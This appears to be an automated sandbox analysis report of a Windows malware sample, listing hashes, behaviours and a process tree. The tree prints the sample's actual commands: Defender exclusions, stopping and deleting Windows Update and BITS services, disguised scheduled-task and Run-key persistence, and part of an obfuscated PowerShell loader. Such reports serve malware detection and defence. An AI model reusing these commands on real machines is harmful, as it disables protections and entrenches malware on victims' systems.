Analysis
max time kernel: 101s
max time network: 139s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/01/2023, 00:40
Static task: static1
Behavioral task: behavioral1
  Sample: 17855519b9e1bde7cabf66a422b5671d4d462968.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: 17855519b9e1bde7cabf66a422b5671d4d462968.exe
  Resource: win10v2004-20221111-en
General
Target: 17855519b9e1bde7cabf66a422b5671d4d462968.exe
Size: 365KB
MD5: ee244310289c82ebe8c73cfd83329f49
SHA1: 17855519b9e1bde7cabf66a422b5671d4d462968
SHA256: 702c24cbf8634002b69a57efdbede5fa256b487e97f7d9272354fdae9c363d33
SHA512: 20053cb845d1ef2845c85596f0d214b04fc8301cb783d8631ca8504af26706e78f046d691a65d1bd8fb9f15ff22e3136d5771f5a9394eb8d534afcc90f350d2b
SSDEEP: 6144:xVjDF2Bp0G3LkjLsvBrL0+ecB4X0Y37cWI+HLq11aWBLXAO19AjWbc:xRDF2BpjLQLsvBP0+ecyEY37CGP
Malware Config
Signatures
Modifies security service (2 TTPs, 5 IoCs)
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess (5 IoCs)
description | pid | Process | procid_target
PID 2300 created 2340 | 2300 | SmartDefRun.exe | 78
PID 2300 created 2340 | 2300 | SmartDefRun.exe | 78
PID 2300 created 2340 | 2300 | SmartDefRun.exe | 78
PID 2300 created 2340 | 2300 | SmartDefRun.exe | 78
PID 4628 created 576 | 4628 | powershell.EXE | 7

Blocklisted process makes network request (4 IoCs)
flow | pid | Process
23 | 4740 | powershell.exe
32 | 4740 | powershell.exe
51 | 4740 | powershell.exe
53 | 4740 | powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory (1 IoCs)
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | SmartDefRun.exe

Executes dropped EXE (2 IoCs)
pid | Process
4712 | SysApp.exe
2300 | SmartDefRun.exe
Stops running service(s) (3 TTPs)

Drops startup file (1 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klService.exe | SysApp.exe

Uses the VBS compiler for execution (1 TTPs)

Drops file in System32 directory (2 IoCs)
description | ioc | Process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE

Suspicious use of SetThreadContext (4 IoCs)
description | pid | Process | procid_target
PID 4972 set thread context of 4188 | 4972 | 17855519b9e1bde7cabf66a422b5671d4d462968.exe | 84
PID 4712 set thread context of 2696 | 4712 | SysApp.exe | 97
PID 2300 set thread context of 1292 | 2300 | SmartDefRun.exe | 121
PID 4628 set thread context of 2040 | 4628 | powershell.EXE | 126

Drops file in Program Files directory (1 IoCs)
description | ioc | Process
File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | SmartDefRun.exe
Launches sc.exe (5 IoCs)
Sc.exe is a Windows utility to control services on the system.
pid | Process
4956 | sc.exe
4112 | sc.exe
1964 | sc.exe
3256 | sc.exe
1920 | sc.exe
Program crash (1 IoCs)
pid | pid_target | Process | procid_target
3248 | 4972 | WerFault.exe | 82

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2064 | schtasks.exe
Modifies data under HKEY_USERS (64 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Suspicious behavior: EnumeratesProcesses (23 IoCs)
pid | Process
4740 | powershell.exe
4740 | powershell.exe
2300 | SmartDefRun.exe
2300 | SmartDefRun.exe
3028 | powershell.exe
3028 | powershell.exe
2300 | SmartDefRun.exe
2300 | SmartDefRun.exe
2300 | SmartDefRun.exe
2300 | SmartDefRun.exe
2984 | powershell.exe
2984 | powershell.exe
2300 | SmartDefRun.exe
2300 | SmartDefRun.exe
4628 | powershell.EXE
4628 | powershell.EXE
3252 | powershell.EXE
3252 | powershell.EXE
4628 | powershell.EXE
2040 | dllhost.exe
2040 | dllhost.exe
2040 | dllhost.exe
2040 | dllhost.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4740 | powershell.exe
Token: SeDebugPrivilege | 3028 | powershell.exe
Token: SeDebugPrivilege | 2984 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2984 | powershell.exe
Token: SeSecurityPrivilege | 2984 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2984 | powershell.exe
Token: SeLoadDriverPrivilege | 2984 | powershell.exe
Token: SeSystemProfilePrivilege | 2984 | powershell.exe
Token: SeSystemtimePrivilege | 2984 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2984 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2984 | powershell.exe
Token: SeCreatePagefilePrivilege | 2984 | powershell.exe
Token: SeBackupPrivilege | 2984 | powershell.exe
Token: SeRestorePrivilege | 2984 | powershell.exe
Token: SeShutdownPrivilege | 2984 | powershell.exe
Token: SeDebugPrivilege | 2984 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2984 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2984 | powershell.exe
Token: SeUndockPrivilege | 2984 | powershell.exe
Token: SeManageVolumePrivilege | 2984 | powershell.exe
Token: 33 | 2984 | powershell.exe
Token: 34 | 2984 | powershell.exe
Token: 35 | 2984 | powershell.exe
Token: 36 | 2984 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2984 | powershell.exe
Token: SeSecurityPrivilege | 2984 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2984 | powershell.exe
Token: SeLoadDriverPrivilege | 2984 | powershell.exe
Token: SeSystemProfilePrivilege | 2984 | powershell.exe
Token: SeSystemtimePrivilege | 2984 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2984 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2984 | powershell.exe
Token: SeCreatePagefilePrivilege | 2984 | powershell.exe
Token: SeBackupPrivilege | 2984 | powershell.exe
Token: SeRestorePrivilege | 2984 | powershell.exe
Token: SeShutdownPrivilege | 2984 | powershell.exe
Token: SeDebugPrivilege | 2984 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2984 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2984 | powershell.exe
Token: SeUndockPrivilege | 2984 | powershell.exe
Token: SeManageVolumePrivilege | 2984 | powershell.exe
Token: 33 | 2984 | powershell.exe
Token: 34 | 2984 | powershell.exe
Token: 35 | 2984 | powershell.exe
Token: 36 | 2984 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2984 | powershell.exe
Token: SeSecurityPrivilege | 2984 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2984 | powershell.exe
Token: SeLoadDriverPrivilege | 2984 | powershell.exe
Token: SeSystemProfilePrivilege | 2984 | powershell.exe
Token: SeSystemtimePrivilege | 2984 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2984 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2984 | powershell.exe
Token: SeCreatePagefilePrivilege | 2984 | powershell.exe
Token: SeBackupPrivilege | 2984 | powershell.exe
Token: SeRestorePrivilege | 2984 | powershell.exe
Token: SeShutdownPrivilege | 2984 | powershell.exe
Token: SeDebugPrivilege | 2984 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2984 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2984 | powershell.exe
Token: SeUndockPrivilege | 2984 | powershell.exe
Token: SeManageVolumePrivilege | 2984 | powershell.exe
Token: 33 | 2984 | powershell.exe
Token: 34 | 2984 | powershell.exe
Suspicious use of WriteProcessMemory (55 IoCs)
description | pid | Process | procid_target
PID 4972 wrote to memory of 4188 | 4972 | 17855519b9e1bde7cabf66a422b5671d4d462968.exe | 84
PID 4972 wrote to memory of 4188 | 4972 | 17855519b9e1bde7cabf66a422b5671d4d462968.exe | 84
PID 4972 wrote to memory of 4188 | 4972 | 17855519b9e1bde7cabf66a422b5671d4d462968.exe | 84
PID 4972 wrote to memory of 4188 | 4972 | 17855519b9e1bde7cabf66a422b5671d4d462968.exe | 84
PID 4972 wrote to memory of 4188 | 4972 | 17855519b9e1bde7cabf66a422b5671d4d462968.exe | 84
PID 4188 wrote to memory of 4740 | 4188 | vbc.exe | 88
PID 4188 wrote to memory of 4740 | 4188 | vbc.exe | 88
PID 4188 wrote to memory of 4740 | 4188 | vbc.exe | 88
PID 4740 wrote to memory of 4712 | 4740 | powershell.exe | 94
PID 4740 wrote to memory of 4712 | 4740 | powershell.exe | 94
PID 4740 wrote to memory of 4712 | 4740 | powershell.exe | 94
PID 4740 wrote to memory of 2300 | 4740 | powershell.exe | 96
PID 4740 wrote to memory of 2300 | 4740 | powershell.exe | 96
PID 4712 wrote to memory of 2696 | 4712 | SysApp.exe | 97
PID 4712 wrote to memory of 2696 | 4712 | SysApp.exe | 97
PID 4712 wrote to memory of 2696 | 4712 | SysApp.exe | 97
PID 4712 wrote to memory of 2696 | 4712 | SysApp.exe | 97
PID 4712 wrote to memory of 2696 | 4712 | SysApp.exe | 97
PID 2696 wrote to memory of 2064 | 2696 | vbc.exe | 98
PID 2696 wrote to memory of 2064 | 2696 | vbc.exe | 98
PID 2696 wrote to memory of 2064 | 2696 | vbc.exe | 98
PID 5020 wrote to memory of 4956 | 5020 | cmd.exe | 109
PID 5020 wrote to memory of 4956 | 5020 | cmd.exe | 109
PID 5020 wrote to memory of 4112 | 5020 | cmd.exe | 110
PID 5020 wrote to memory of 4112 | 5020 | cmd.exe | 110
PID 5020 wrote to memory of 1964 | 5020 | cmd.exe | 111
PID 5020 wrote to memory of 1964 | 5020 | cmd.exe | 111
PID 5020 wrote to memory of 3256 | 5020 | cmd.exe | 112
PID 5020 wrote to memory of 3256 | 5020 | cmd.exe | 112
PID 5020 wrote to memory of 1920 | 5020 | cmd.exe | 113
PID 5020 wrote to memory of 1920 | 5020 | cmd.exe | 113
PID 5020 wrote to memory of 4828 | 5020 | cmd.exe | 114
PID 5020 wrote to memory of 4828 | 5020 | cmd.exe | 114
PID 5020 wrote to memory of 2636 | 5020 | cmd.exe | 116
PID 5020 wrote to memory of 2636 | 5020 | cmd.exe | 116
PID 5020 wrote to memory of 3200 | 5020 | cmd.exe | 117
PID 5020 wrote to memory of 3200 | 5020 | cmd.exe | 117
PID 5020 wrote to memory of 4760 | 5020 | cmd.exe | 118
PID 5020 wrote to memory of 4760 | 5020 | cmd.exe | 118
PID 5020 wrote to memory of 2180 | 5020 | cmd.exe | 119
PID 5020 wrote to memory of 2180 | 5020 | cmd.exe | 119
PID 2300 wrote to memory of 1292 | 2300 | SmartDefRun.exe | 121
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 4628 wrote to memory of 2040 | 4628 | powershell.EXE | 126
PID 2040 wrote to memory of 576 | 2040 | dllhost.exe | 7
PID 2040 wrote to memory of 660 | 2040 | dllhost.exe | 6
PID 2040 wrote to memory of 944 | 2040 | dllhost.exe | 14
PID 2040 wrote to memory of 1012 | 2040 | dllhost.exe | 10
Processes
[1] C:\Windows\system32\lsass.exe
    Command line: C:\Windows\system32\lsass.exe
    PID: 660
[1] C:\Windows\system32\winlogon.exe
    Command line: winlogon.exe
    PID: 576
    [2] C:\Windows\system32\dwm.exe
        Command line: "dwm.exe"
        PID: 1012
    [2] C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{15b1f8f6-2ff2-46cc-907a-519bf3c9e19b}
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 2040
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
    PID: 944
[1] C:\Windows\Explorer.EXE
    Command line: C:\Windows\Explorer.EXE
    PID: 2340
    [2] C:\Users\Admin\AppData\Local\Temp\17855519b9e1bde7cabf66a422b5671d4d462968.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\17855519b9e1bde7cabf66a422b5671d4d462968.exe"
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory
        PID: 4972
        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            - Suspicious use of WriteProcessMemory
            PID: 4188
            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                - Blocklisted process makes network request
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
                PID: 4740
                [5] C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                    Command line: "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                    - Executes dropped EXE
                    - Drops startup file
                    - Suspicious use of SetThreadContext
                    - Suspicious use of WriteProcessMemory
                    PID: 4712
                    [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        - Suspicious use of WriteProcessMemory
                        PID: 2696
                        [7] C:\Windows\SysWOW64\schtasks.exe
                            Command line: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                            - Creates scheduled task(s)
                            PID: 2064
                [5] C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                    Command line: "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                    - Suspicious use of NtCreateUserProcessOtherParentProcess
                    - Drops file in Drivers directory
                    - Executes dropped EXE
                    - Suspicious use of SetThreadContext
                    - Drops file in Program Files directory
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of WriteProcessMemory
                    PID: 2300
        [3] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 312
            - Program crash
            PID: 3248
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3028
    [2] C:\Windows\System32\cmd.exe
        Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        - Suspicious use of WriteProcessMemory
        PID: 5020
        [3] C:\Windows\System32\sc.exe
            Command line: sc stop UsoSvc
            - Launches sc.exe
            PID: 4956
        [3] C:\Windows\System32\sc.exe
            Command line: sc stop WaaSMedicSvc
            - Launches sc.exe
            PID: 4112
        [3] C:\Windows\System32\sc.exe
            Command line: sc stop wuauserv
            - Launches sc.exe
            PID: 1964
        [3] C:\Windows\System32\sc.exe
            Command line: sc stop bits
            - Launches sc.exe
            PID: 3256
        [3] C:\Windows\System32\sc.exe
            Command line: sc stop dosvc
            - Launches sc.exe
            PID: 1920
        [3] C:\Windows\System32\reg.exe
            Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
            PID: 4828
        [3] C:\Windows\System32\reg.exe
            Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            PID: 2636
        [3] C:\Windows\System32\reg.exe
            Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
            - Modifies security service
            PID: 3200
        [3] C:\Windows\System32\reg.exe
            Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
            PID: 4760
        [3] C:\Windows\System32\reg.exe
            Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
            PID: 2180
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2984
    [2] C:\Windows\System32\dialer.exe
        Command line: C:\Windows\System32\dialer.exe
        PID: 1292
[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4972 -ip 4972
    PID: 4016
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:eWeaOgdfVQBO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aflNzVHGWgjtPW,[Parameter(Position=1)][Type]$SzyZOOuJDy)$NckIWEVLpjq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+'le'+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'ele'+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+'r'+''+'y'+'M'+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+'g'+'a'+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+'Pu'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+'s'+'s'+','+'A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NckIWEVLpjq.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aflNzVHGWgjtPW).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$NckIWEVLpjq.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'e'+'w'+''+'S'+''+[Char](108)+''
